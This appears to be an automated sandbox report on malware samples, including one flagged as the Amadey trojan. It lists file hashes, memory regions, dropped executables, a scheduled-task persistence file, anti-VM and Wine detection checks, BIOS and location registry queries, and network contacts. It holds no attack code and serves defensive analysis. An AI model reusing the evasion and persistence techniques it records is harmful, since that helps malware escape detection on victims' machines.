SHA512 35d95d7672a2f3f1796317d3b455bc6575e997ce67c049a4ccc0971a8066820df1f0e069b9a1e07e615cf87685fdd0518859d4769f132f02fe38dfe534118ed1

C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe

MD5 ffada57f998ed6a72b6ba2f072d2690a
SHA1 6857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f
SHA256 677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12
SHA512 1de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f

memory/796-647-0x0000000004560000-0x0000000004958000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini

MD5 a483da8b27289fc9cc49d6b17e61cbf6
SHA1 2d4a5a704c2ff332df6436b7bcd16365f03c2a97
SHA256 f7785d4e80691cb2bb59301fe8962e50862c44d8992a0e308f86689b7ee76911
SHA512 e0d061a5ed7c7789d11331b192c0693e9a49398de371153d1d13a8b7a32ae7078ea103b03a535ebd0581f1d9d56bacf77b9e31f68ab1888663111e8d2afea0a9

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 5cdfc4b9de66db60219b702987b6884f
SHA1 3f664159cd6af48abc3f4c4a2d0ec16ff715b208
SHA256 9a52a5e9dcfcc59699cab7a8777c114d2b9685e68b00502c0bfb28b42ef3321d
SHA512 3c14da8a340736a697b4b2188b1b250b7328278a11e3483cc684247a2c10fc2b69435013e2704275dae319d992a048ff66a074065e91e9a2f65cfbd24a874d1d

memory/2560-691-0x0000000001040000-0x0000000001511000-memory.dmp

C:\Users\Admin\Pictures\tX8T2gJKxzDcDwjjjrjNMPV9.exe

MD5 5cc472dcd66120aed74de36341bfd75a
SHA1 1dfc4d42da90fe070d4474ddd7fa7b6f6ffa97ab
SHA256 958dd14c90b1c73852f926608f212377aa3a36666c04024f97c20deb375e9773
SHA512 b5cf358d95ec9a6cca81d2e9c23f0ede93ab94963bb5c626f4e6233a06cedae63b73dd81d2455acb29b003c3b4e2f54da6010daebc4639a3dcc54314d4fe4f81

memory/2388-706-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/1624-712-0x0000000140000000-0x0000000140A55000-memory.dmp

C:\Users\Admin\Pictures\7WRtealACcE9KDLVlx7PIPxc.exe

MD5 3d233051324a244029b80824692b2ad4
SHA1 a053ebdacbd5db447c35df6c4c1686920593ef96
SHA256 fbd467ce72bca00eea3aaa6f32abc8aca1a734030d082458e21e1fe91e6a8d84
SHA512 7f19c6400ac46556a9441844242b1acb0b2f11a47f5d51f6d092406a8c759a6d78c578bb5b15035e7cd1cdb3035acf0db884708b0da1a83eb652a50a68e3a949

memory/1680-707-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/1792-708-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/1848-717-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/1616-722-0x0000000002050000-0x00000000026BE000-memory.dmp

memory/1640-723-0x0000000001080000-0x00000000016EE000-memory.dmp

memory/1640-724-0x00000000008D0000-0x0000000000F3E000-memory.dmp

memory/1640-725-0x00000000008D0000-0x0000000000F3E000-memory.dmp

memory/1640-726-0x00000000008D0000-0x0000000000F3E000-memory.dmp

memory/2560-727-0x0000000005FB0000-0x00000000062F9000-memory.dmp

memory/1124-728-0x000000001B3D0000-0x000000001B6B2000-memory.dmp

memory/1124-729-0x00000000025E0000-0x00000000025E8000-memory.dmp

memory/2560-744-0x0000000001040000-0x0000000001511000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS3830.tmp\Install.exe

MD5 220a02a940078153b4063f42f206087b
SHA1 02fc647d857573a253a1ab796d162244eb179315
SHA256 7eb93d93b03447a6bafd7e084305d41bf9780bd415cb2e70020952d06f3d7b60
SHA512 42ac563a7c28cbf361bfb150d5469f0278ab87ce445b437eef8425fb779689d70230b550815f30f9db2909c1ba0dd015b172dfe3e718d26706856f4cb0eeeeaa

memory/3392-749-0x00000000014F0000-0x0000000001B5E000-memory.dmp

memory/3392-748-0x00000000014F0000-0x0000000001B5E000-memory.dmp

memory/3392-747-0x0000000000E80000-0x00000000014EE000-memory.dmp

memory/3296-746-0x0000000002020000-0x000000000268E000-memory.dmp

memory/796-745-0x0000000000400000-0x0000000002B0C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3PUVF7852WPQGXNAWL0E.temp

MD5 2750af5e157c729938337db26e51f5ce
SHA1 b6c9fc89e39b80647309a842c03b8298fd00a391
SHA256 424181b1af0739ba1646473c09e9bdd204918caee81fd20b6123ae202ab7e640
SHA512 11567f609a821183e4f8169a79f7ec04ab8518d502342902eb8e83d76b89a2fcddb58489e278bfc2f69ee15ae8e564ff16dae0972f8f368cccf706ca460fa759

memory/2388-752-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/1680-753-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/1792-754-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/1640-756-0x0000000010000000-0x00000000105DD000-memory.dmp

memory/1848-759-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/3392-764-0x0000000010000000-0x00000000105DD000-memory.dmp

memory/2560-767-0x0000000001040000-0x0000000001511000-memory.dmp

memory/1184-769-0x000000000C920000-0x000000000D375000-memory.dmp

memory/796-768-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/3776-779-0x000000001B300000-0x000000001B5E2000-memory.dmp

memory/3776-780-0x0000000002370000-0x0000000002378000-memory.dmp

memory/2388-785-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/1680-787-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/1792-788-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/1848-790-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/2560-792-0x0000000001040000-0x0000000001511000-memory.dmp

memory/796-793-0x0000000000400000-0x0000000002B0C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9C20.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

memory/2388-805-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/1680-806-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/2560-815-0x0000000001040000-0x0000000001511000-memory.dmp

memory/2948-820-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

memory/1616-822-0x0000000002050000-0x00000000026BE000-memory.dmp

memory/1640-823-0x0000000001080000-0x00000000016EE000-memory.dmp

memory/1640-829-0x00000000008D0000-0x0000000000F3E000-memory.dmp

memory/1640-828-0x00000000008D0000-0x0000000000F3E000-memory.dmp

memory/1640-830-0x00000000008D0000-0x0000000000F3E000-memory.dmp

memory/796-821-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/2388-831-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/2560-847-0x0000000001040000-0x0000000001511000-memory.dmp

memory/1848-846-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/1680-843-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/3296-849-0x0000000002020000-0x000000000268E000-memory.dmp

memory/1792-844-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/3392-852-0x00000000014F0000-0x0000000001B5E000-memory.dmp

memory/3392-851-0x00000000014F0000-0x0000000001B5E000-memory.dmp

memory/3392-850-0x0000000000E80000-0x00000000014EE000-memory.dmp

memory/796-848-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/1848-853-0x0000000000400000-0x0000000002B0C000-memory.dmp

memory/3540-866-0x000000001B3A0000-0x000000001B682000-memory.dmp

memory/3540-867-0x0000000002410000-0x0000000002418000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-14 01:02

Reported

2024-05-14 01:04

Platform

win10v2004-20240508-en

Max time kernel

142s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\axplons.job C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe

"C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe"

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4232,i,1067197275908310731,12785105794523264014,262144 --variations-seed-version --mojo-platform-channel-handle=4404 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
RU 5.42.96.7:80 5.42.96.7 tcp
US 8.8.8.8:53 7.96.42.5.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

memory/904-0-0x0000000000370000-0x0000000000841000-memory.dmp

memory/904-1-0x0000000077504000-0x0000000077506000-memory.dmp

memory/904-2-0x0000000000371000-0x000000000039F000-memory.dmp

memory/904-3-0x0000000000370000-0x0000000000841000-memory.dmp

memory/904-5-0x0000000000370000-0x0000000000841000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

MD5 17ee93b40d1746f9d99cf8521a2ab566
SHA1 371e878e7c8ff19a0f8771aefef9aeb6e28c2b87
SHA256 49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468
SHA512 21f8f6cf4d58775e4498bb1bb86437c30494d633da800ef3427bce4d7e4877018752fb091eb4627ccb0d14bc9f45afd199c752fceb1f4202d2b9d94efc6d01a7

memory/904-17-0x0000000000370000-0x0000000000841000-memory.dmp

memory/3144-18-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-20-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-19-0x00000000007D1000-0x00000000007FF000-memory.dmp

memory/3144-21-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-22-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-23-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-24-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-25-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-26-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-27-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/5016-29-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/5016-30-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/5016-31-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/5016-32-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-33-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-34-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-35-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-36-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-37-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-38-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/4972-40-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/4972-41-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-42-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-43-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-44-0x00000000007D0000-0x0000000000CA1000-memory.dmp

memory/3144-45-0x00000000007D0000-0x0000000000CA1000-memory.dmp